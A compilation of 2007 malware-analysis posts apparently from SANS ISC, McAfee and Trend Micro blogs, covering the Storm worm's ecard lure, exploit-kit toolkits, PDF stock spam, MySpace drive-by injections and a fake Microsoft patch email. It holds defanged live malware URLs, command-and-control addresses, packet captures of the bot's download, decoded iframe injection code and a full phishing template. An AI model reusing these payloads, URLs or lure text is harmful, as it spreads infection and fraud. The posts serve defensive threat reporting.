/\>bb0f8963b6\u003cbr /\>\u003cbr /\>\u003c/div\>",0] ); D(["ce"]); //-->

Aditional Information
File size: 7915 bytes
MD5: 30051dc10636730e4d6402ef8e88fd04
SHA1: 05368309bf89a78d680e239f58ec39bb0f8963b6

 Update1:

If javascript is disabled and a user downloads /ecard.exe (hosted on the IP mentioned in the SPAM) and executes it

ecard.exe connects to 66.148.74.35 on port 80/TCP.
14361 | 66.148.74.35 | 66.148.64.0/19 | US | arin | HOPONE-GLOBAL - HopOne Internet Corporation

Our testing hasn't resulted in a secondary malware download by ecard.exe yet.
However here are two malicious URLs on this IP reported via Castlecops in May
(http://www.castlecops.com/p945429-omega_it_ru.html)

http://66.148.74 .35/aff/dir/sony.exe
http://66.148.74 .35/aff/dir/pdp.exe

Notice the "/aff/dir/" path.

If javascript is enabled a download (from the IP in the SPAM) and execution is attempted
urlRealExe = http://200.82.187 .228/file.php
XMLHttpDownload(v[0], urlRealExe)

If that fails, an exploit routine is started in order to cause the download:
startOverflow(0)

There are 3 exploits available and they are tried in order.
The first one is for QuickTime.
If that fails a Winzip exploit is attempted
If that fails, the "hail mary" is the WebViewFolderIcon exploit.

Assuming the file is downloaded and executed. It calls home to 75.126.21.162 (75.126.21.162-static.reverse.kosmohost.net) on port 80/TCP
36351 | 75.126.21.162 | 75.126.0.0/17 | US | arin | SOFTLAYER - SoftLayer Technologies Inc

This IP may look familiar to many. Its been doing its bad thing since at least December, 2006.
And here are a number of domains mapped to this IP that might look familiar
2007postcards.com
jokeonlineworld.com
practicaljokeonline.com
postcardsbargain.com
freewebpostcards.com
mailfreepostcards.com
ecolorpostcards.com

Here's the initial callhome (notice the "/aff/" path)

 TCP Conversation from <infected pc>:1066 to 75.126.21.162:80
Data sent:    
   
4745 5420 2f61 6666 2f63 6e74 722e 7068    GET /aff/cntr.ph
703f 623d 3e40 3e3d 2663 3d37 3937 3626    p?b=>@>=&c=7976&
643d 3132 3220 4854 5450 2f31 2e31 0d0a    d=122 HTTP/1.1..
4163 6365 7074 3a20 2a2f 2a0d 0a41 6363    Accept: */*..Acc
6570 742d 456e 636f 6469 6e67 3a20 677a    ept-Encoding: gz
6970 2c20 6465 666c 6174 650d 0a55 7365    ip, deflate..Use
722d 4167 656e 743a 204d 6f7a 696c 6c61    r-Agent: Mozilla
2f34 2e30 2028 636f 6d70 6174 6962 6c65    /4.0 (compatible
3b20 4d53 4945 2036 2e30 3b20 5769 6e64    ; MSIE 6.0; Wind
6f77 7320 4e54 2035 2e31 3b20 5356 3129    ows NT 5.1; SV1)
0d0a 486f 7374 3a20 3735 2e31 3236 2e32    ..Host: 75.126.2
312e 3136 320d 0a43 6f6e 6e65 6374 696f    1.162..Connectio
6e3a 204b 6565 702d 416c 6976 650d 0a0d    n: Keep-Alive...
0a                                         .

Here's our encoded reply:

75.126.21.162:80 to <infected pc>:1066
Data received:    
   
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 2f30    .Server: nginx/0
2e35 2e31 320d 0a44 6174 653a 2054 6875    .5.12..Date: Thu
2c20 3238 204a 756e 2032 3030 3720 3231    , 28 Jun 2007 21
3a30 353a 3539 2047 4d54 0d0a 436f 6e74    :05:59 GMT..Cont
656e 742d 5479 7065 3a20 7465 7874 2f68    ent-Type: text/h
746d 6c0d 0a54 7261 6e73 6665 722d 456e    tml..Transfer-En
636f 6469 6e67 3a20 6368 756e 6b65 640d    coding: chunked.
0a43 6f6e 6e65 6374 696f 6e3a 206b 6565    .Connection: kee
702d 616c 6976 650d 0a58 2d50 6f77 6572    p-alive..X-Power
6564 2d42 793a 2050 4850 2f35 2e32 2e31    ed-By: PHP/5.2.1
0d0a 0d0a 3366 0d0a 3f40 463c 3f41 3e3c    ....3f..?@F<?A><
443e 3c3f 440a 333a 3a35 3537 3933 0a33    D><?D.3::55793.3
0a69 7575 713b 3030 3836 2f32 3337 2f33    .iuuq;0086/237/3
322f 3237 3330 6267 6730 656a 7330 6d70    2/2730bgg0ejs0mp
686a 2f66 7966 0a0d 0a30 0d0a 0d0a         hj/fyf...0....

Here is the PC acting on the command and requesting a file download
(GET /aff/dir/logi.exe)

<infected pc>:1066 to 75.126.21.162:80
Data sent:    

4745 5420 2f61 6666 2f64 6972 2f6c 6f67    GET /aff/dir/log
692e 6578 6520 4854 5450 2f31 2e31 0d0a    i.exe HTTP/1.1..
4163 6365 7074 3a20 2a2f 2a0d 0a41 6363    Accept: */*..Acc
6570 742d 456e 636f 6469 6e67 3a20 677a    ept-Encoding: gz
6970 2c20 6465 666c 6174 650d 0a55 7365    ip, deflate..Use
722d 4167 656e 743a 204d 6f7a 696c 6c61    r-Agent: Mozilla
2f34 2e30 2028 636f 6d70 6174 6962 6c65    /4.0 (compatible
3b20 4d53 4945 2036 2e30 3b20 5769 6e64    ; MSIE 6.0; Wind
6f77 7320 4e54 2035 2e31 3b20 5356 3129    ows NT 5.1; SV1)
0d0a 486f 7374 3a20 3735 2e31 3236 2e32    ..Host: 75.126.2
312e 3136 320d 0a43 6f6e 6e65 6374 696f    1.162..Connectio
6e3a 204b 6565 702d 416c 6976 650d 0a0d    n: Keep-Alive...
0a                                         .

Here come's the new malware binary that will be executed:

75.126.21.162:80 to <infected pc>:1066
Data received:    
   
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 2f30    .Server: nginx/0
2e35 2e31 320d 0a44 6174 653a 2054 6875    .5.12..Date: Thu
2c20 3238 204a 756e 2032 3030 3720 3231    , 28 Jun 2007 21
3a30 353a 3539 2047 4d54 0d0a 436f 6e74    :05:59 GMT..Cont
656e 742d 5479 7065 3a20 6170 706c 6963    ent-Type: applic
6174 696f 6e2f 6f63 7465 742d 7374 7265    ation/octet-stre
616d 0d0a 436f 6e6e 6563 7469 6f6e 3a20    am..Connection:
6b65 6570 2d61 6c69 7665 0d0a 436f 6e74    keep-alive..Cont
656e 742d 4c65 6e67 7468 3a20 3133 3338    ent-Length: 1338
3637 0d0a 4c61 7374 2d4d 6f64 6966 6965    67..Last-Modifie
643a 2054 6875 2c20 3238 204a 756e 2032    d: Thu, 28 Jun 2
3030 3720 3138 3a30 343a 3435 2047 4d54    007 18:04:45 GMT
0d0a 4163 6365 7074 2d52 616e 6765 733a    ..Accept-Ranges:
2062 7974 6573 0d0a 0d0a 4d5a 9000 0300     bytes....MZ....
0000 0400 0000 ffff 0000 b800 0000 0000    ................
0000 4000 0000 0000 0000 0000 0000 0000    ..@.............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 e000 0000 0e1f ba0e 00b4    ................
09cd 21b8 014c cd21 5468 6973 2070 726f    ..!..L.!This pro
6772 616d 2063 616e 6e6f 7420 6265 2072    gram cannot be r
756e 2069 6e20 444f 5320 6d6f 6465 2e0d    un in DOS mode..

Ok so now they're in business. Here is the peers file Storm needs to get the new zombie bootstrapped into the P2P botnet

C:\WINDOWS\system32\windev-peers.ini

And now we're off to the UDP races with Storm P2P activity flowing over a number of upper random UDP ports as well as a few
more recognizable Storm UDP ports:
7871
16275
11275
11271

And finally, here are a few more of the malware hosting servers they've relied on in recent months in addition to the HopOne and Softlayer host above:

27645 | 205.209.179.15 | 205.209.128.0/18 | US | arin | ASN-NA-MSG-01 - Managed Solutions Group, Inc
27595 | 216.255.189.214 | 216.255.176.0/20 | US | arin | INTERCAGE - InterCage, Inc
14361 | 66.148.74.7 | 66.148.64.0/19 | US | arin | HOPONE-DCA - HopOne Internet Corporation
36351 | 75.126.21.162 | 75.126.0.0/17 | US | arin | SOFTLAYER - SoftLayer Technologies Inc
36351 | 75.126.226.224 | 75.126.0.0/16 | US | arin | SOFTLAYER - SoftLayer Technologies Inc

 

Most excellent analysis provided by Anubis.

SANS ISC Handlers

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Zero Day Threats: Part 3 - When & How Are They Released?

Tuesday June 26, 2007 at 9:16 am CST
Posted by Craig Schmugar

Trackback

In part 2 of this blog series, I touched on the profile and motivations of those behind Zero Day Threats.  In part 3, we’ll take a look at when and how these threats are released/discovered.

In 2003, Microsoft moved to a monthly patch release cycle (commonly known as Patch Tuesday, for the second Tuesday of each month).  After a while people noticed a correlation between when zero day vulnerabilities were discovered/disclosed and the proximity to Patch Tuesday.  Some concluded that many zero day threats are strategically released very close to Patch Tuesday as a means to maximize the Window of Vulnerability (time that an attacker can take advantage of a yet-to-be patched vulnerability).  To test this theory, I took a look at some 200 Microsoft zero day vulnerabilities since January 2005, tracking when they were discovered relative to the closest Patch Tuesday.  You may be asking, 200 Microsoft zero day vulnerabilities since January 2005 ?!?  While some consider local denial-of-service vulnerabilities not to be zero days, I’ll defer to my previous definition, which was used for the purpose of creating the chart below:

The public availability of exploit information on the same day that a vulnerability is publicly disclosed.

This chart plots the proximity of discovery from the closest Patch Tuesday.

This data can be broken down as follows:

• In 2005,   7 (18%) Zero Day threats were discovered ±3 days of Patch Tuesday.
• In 2006, 36 (31%) Zero Day threats were discovered within the same time frame.
• In 2007, 10 (24%) Zero Day threats were discovered within the same time frame (as of April 15)

NOTE: ±3 days is a 7 day window.  Given an even distribution, one would expect to find 23% of all vulnerabilities during this window.  The data suggests that at least in 2005 and 2007 strategic releases were not that common; and even 2006 only showed an 8% deviation.

There is another significant factor to consider…vulnerabilities discovered through active exploitation have been erroneously assigned the date of disclosure, rather than the date of release.  Of course there is a good reason for this, the release date is not always known.  There have been cases in the past where server logs showed evidence of zero day vulnerabilities being uploaded well in advance of the discovery date.

The following chart represents the number and method that zero day threats were discovered/disclosed when comparing two six month periods:

Roughly 10% of all vulnerabilities were first discovered through active exploitation.  While a significant number, 42% of these were discovered within the ±3 day window, we don’t know the actual release date for many of them.

So where does this leave us?  Well, undoubtedly some attackers are waiting for the right moment to strike, but this is somewhat akin to trying to sell stock at its peak price.  Attackers can’t really know how long their zero day threat will go unnoticed, when it will be reported to the vendor, patched, etc.  They can be sure that if they release their threat within a few days before Patch Tuesday that Microsoft would have to pull-off something yet-to-happen to date; the release of an emergency patch in under 6 days.  If they release say 10 days before Patch Tuesday, it’s a gamble that the threat will go unnoticed for at least a few days before being reported to Microsoft.  Of course they could wait until just after Patch Tuesday to release, but by doing so they would fail to maximize the duration of effectiveness.

It’s more likely that many attackers do not wait and simply release their threats as soon as they are ready to be released.  The more time that passes, the greater the chance that the vulnerability will be disclosed and/or patched.

Check back later in the week for the 4th and final part of this blog series.

Source: Computer Security Research - McAfee Avert Labs Blog

All roads lead to TROJ_SMALL.FXD

June 27th, 2007 by Jasper Pimentel

We’ve received reports of a web threat toolkit similar to WebAttacker and MPack being hosted at a particular domain. This new toolkit utilizes a variety of exploits to download TROJ_SMALL.FXD into the affected system. We’ve checked several obfuscated PHP files contained within a directory behind this domain and so far, here’s what we have on this new threat:

Through IFRAME tags, a file called INDEX.PHP loads other webpages located in the same directory: Z-CS-AN.HTM, Z-JAVA1.PHP, Z-014-2.PHP, Z-CREATE-O.PHP, Z-014-1.PHP, and Z-PNG-OV.PHP

Z-CS-AN.HTM is an HTML file that loads FILE.JPG (also located in the same directory) as an animated cursor. Through FILE.JPG, it exploits the animated cursor vulnerability in Windows similar to ANICMOO. FILE.JPG is already detected by Trend as EXPL_ANICMOO.GEN. Further inspection of the file reveals a download location and the executable file that is retrieved from this location(FILE.EXE) is actually a Trojan downloader that is detected by Trend as TROJ_SMALL.FXD.

Z-JAVA-1.PHP makes use of a .JAR file that contains malicious java classes compiled as web page applets. These applets are detected by Trend as JAVA_BYTEVER. It exploits the ByteVerifier vulnerability in unpatched versions of Microsoft (MS) Java Virtual Machine, which could allow a file to be downloaded and executed without a user’s knowledge. Through the use of this exploit, TROJ_SMALL.FXD is downloaded.

Z-014-2.PHP, Z-CREATE-O.PHP and Z-014-1.PHP have obfuscated JavaScript and Vbscript code. All of them have similar content in terms of functionality, which is to download and execute TROJ_SMALL.FXD. These 3 PHP files differ in the method that they use to download the malware and how they rename its file once it is successfully downloaded in the affected system.

Z-PNG-OV.PHP exploits the vulnerability indicated in MS06-024 using the PNG File residing in the same directory. Remote code execution vulnerability exists in Windows Media Player due to the way it handles the processing of PNG images. Through the use of this exploit, TROJ_SMALL.FXD is downloaded.

In summary, this particular web threat toolkit makes sure that TROJ_SMALL.FXD is downloaded regardless of the method or exploit used. Most of the vulnerabilities exploited are nothing new so be sure to patch your systems as a security measure.

These files have been sent to the proper channels so that an appropriate solution can be deployed. We’ll keep you posted for updates.

Source: TrendLabs | Malware Blog - by Trend Micro

PDF Spam Outbreak

Tuesday June 26, 2007 at 8:44 am CST
Posted by Nick Kelly

Trackback

A large “pump-and-dump” stock spam campaign is underway, but rather than including the content of the spam in an image file, this campaign includes the spam content within a .PDF file. The stock spam is believed to be sent from Stration infected computers, as this spam campaign closely followed a new W32/Stration worm mass-mailing which contained a number of .PDF files, and Stration has been associated with pump and dump spam in the past.

The current spam contains one or more .PDF files, has a randomly generated subject line and sender name, and a blank message body. The .PDF files contain images which look very similar to previous image based stock spam. 

The appearance of PDF-based spam was predicted by AVERT in the article “Email Spam Plague Persists” in the latest SAGE report, as .PDF files can be more easily automated than other document formats. This prediction appears to be holding true, and as .GIF based image spam continues to decline we expect spammers will continue to try similar methods of sending image based spam.

Source: Computer Security Research - McAfee Avert Labs Blog

MySpace Flux Malware

Published: 2007-06-26,
Last Updated: 2007-06-26 22:44:49 UTC
by Johannes Ullrich (Version: 2)

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.
  FluxBot (aka "Fast-Flux") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.
  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010
  A typical excerpt from an infected profile (obfuscated to protect the innocent): 

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>

   The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
height=1></iframe>
    The domain used here is of course again served via flux. header_03.gif

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>

   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:
(Warning: live malware URLs visit at your own risk)

http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
URLs:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
Settings for the bot can be found here:
http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.
Couple IPs that may be worthwhile to block:
AS13767   | 72.232.254.218 
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86    
AS25761   | 72.20.6.10   
As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team

SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

FAKE Microsoft patch email -> Fake Spyware Doctor!

Published: 2007-06-26,
Last Updated: 2007-06-26 21:53:12 UTC
by donald smith (Version: 2)

Several of our readers reported an email that lead to a fake Microsoft patch being spammed on the net today. The email had their full names and in one case the company they worked for included in the body of the email. So far I have seen 4 different urls. We are working on getting the systems hosting the malware cleaned or shutdown. We have submitted the malware itself to most of the AV vendors so detection should improve but currently it is not detected.

Thanks go out to PatrickC, TroyP, NathanM, BruceD and CalebC.

You can see in the body of the email below that the spelling is bad and the license key is not in the right format for XP nor Outlook.

Microsoft pointed us to a couple of web pages they maintain that should help you recognize fraudulent email:

http://www.microsoft.com/protect/yourself/phishing/msemail.mspx

 http://www.microsoft.com/canada/athome/security/email/ms_genuine_mail.mspx

One of the submitters “PatrickC” provided the following email for a fake Microsoft patch and malware site.  

“The following email I received is new to me. The URL points to
hxxp://fake.microsoft.site./MSOUTRC2007Update-KB863892.exe
Bye.”
==Sanitized email header==============
X-Envelope-To: <patrick >
<SNIP to protect Patrick >
Date: Tue, 26 Jun 2007 14:51:39 +0200
Precedence: bulk
To: Patrick 
Subject: Microsoft Security Bulletin MS07-0065 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Content-Type: text/html; charset=iso-8859-1
Message-Id: <E1I3AWB-00010F-00@s137553944.websitehome.co.uk>
X-Antivirus: avast! (VPS 000752-0, 2007-06-25), Inbound message
X-Antivirus-Status: Clean 
Microsoft.com Home |
| Windows Family | Windows Marketplace | Office Family | Microsoft Update  
Dear Patrick

You are receiving this message because you are using Genuine Microsoft Software and your e-mail address has been subscribed to the Microsoft Windows Update mailing list.

A new 0-day vulnerability has appeared in the wild and was reported for the first time Monday, June 18th. The vulnerability affects machines running MICROSOFT OUTLOOK and allows an attacker to take full control of the vulnerable computer if the exploitation process is succesfull.

Since then, more than 100,000 machines have been reported as exploited and used to promote spammy pharmacy products such as viagra and cialis.

An update has been released to fix this issue and can be downloaded from the following link :

http://windowsupdate.microsoft.com/outlook/upd ate-0-day/download.aspx?id=63852

Quick Details
File Name: MSOUTRC2007Update-KB863892.exe
Version: 3.1.1023
Date Published: 06/25/2007
Download Size: 20 Kb
Estimated Download Time: 1 sec

It's urgent to download and install the update as soon as possible in order to decrease the number of succesfull attacks that occure each day. The update is only available for Genuine Versions of Microsoft Outllok. 
Instructions :  
1. Click the link above to start the download
2. Save the update in your WINDOWS directory and run it from there.If you want to start the installation immediately click Run in the download box, after you click the link.
3. After you run it, the update will download the security packages required to patch Microsoft Outlook.The entire process will take around 10-15 minutes, and you'll receive a confirmation message once the update process is completed.

Your Microsoft Windows Licence Information is :

REG ISTERED TO : Patrick
Licence KEY : XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

Thank you

Microsoft Corp.

=====================================

From Norman Sandbox:

MSOUTRC2007Update-KB863892.exe : INFECTED with W32/Malware (Signature: NO_VIRUS)

 [ DetectionInfo ]
    * Sandbox name: W32/Malware
    * Signature name: NO_VIRUS
 [ General information ]
    * Drops files in %WINSYS% folder.
    * File length:        20480 bytes.
    * MD5 hash: c7a8bde380043b5d8d7229e82db1c2fc.
 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\sdoctor.exe.
    * Creates file C:\france.html.
    * Deletes file c:\france.html.
 [ Changes to registry ]
    * Creates value "SpywareDoctor"="C:\WINDOWS\SYSTEM32\sdoctor.exe" in key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
 [ Process/window information ]
    * Will automatically restart after boot (I'll be back...).
    * Attemps to NULL C:\COMMAND.COM /c del c:\sample.exe >> NUL.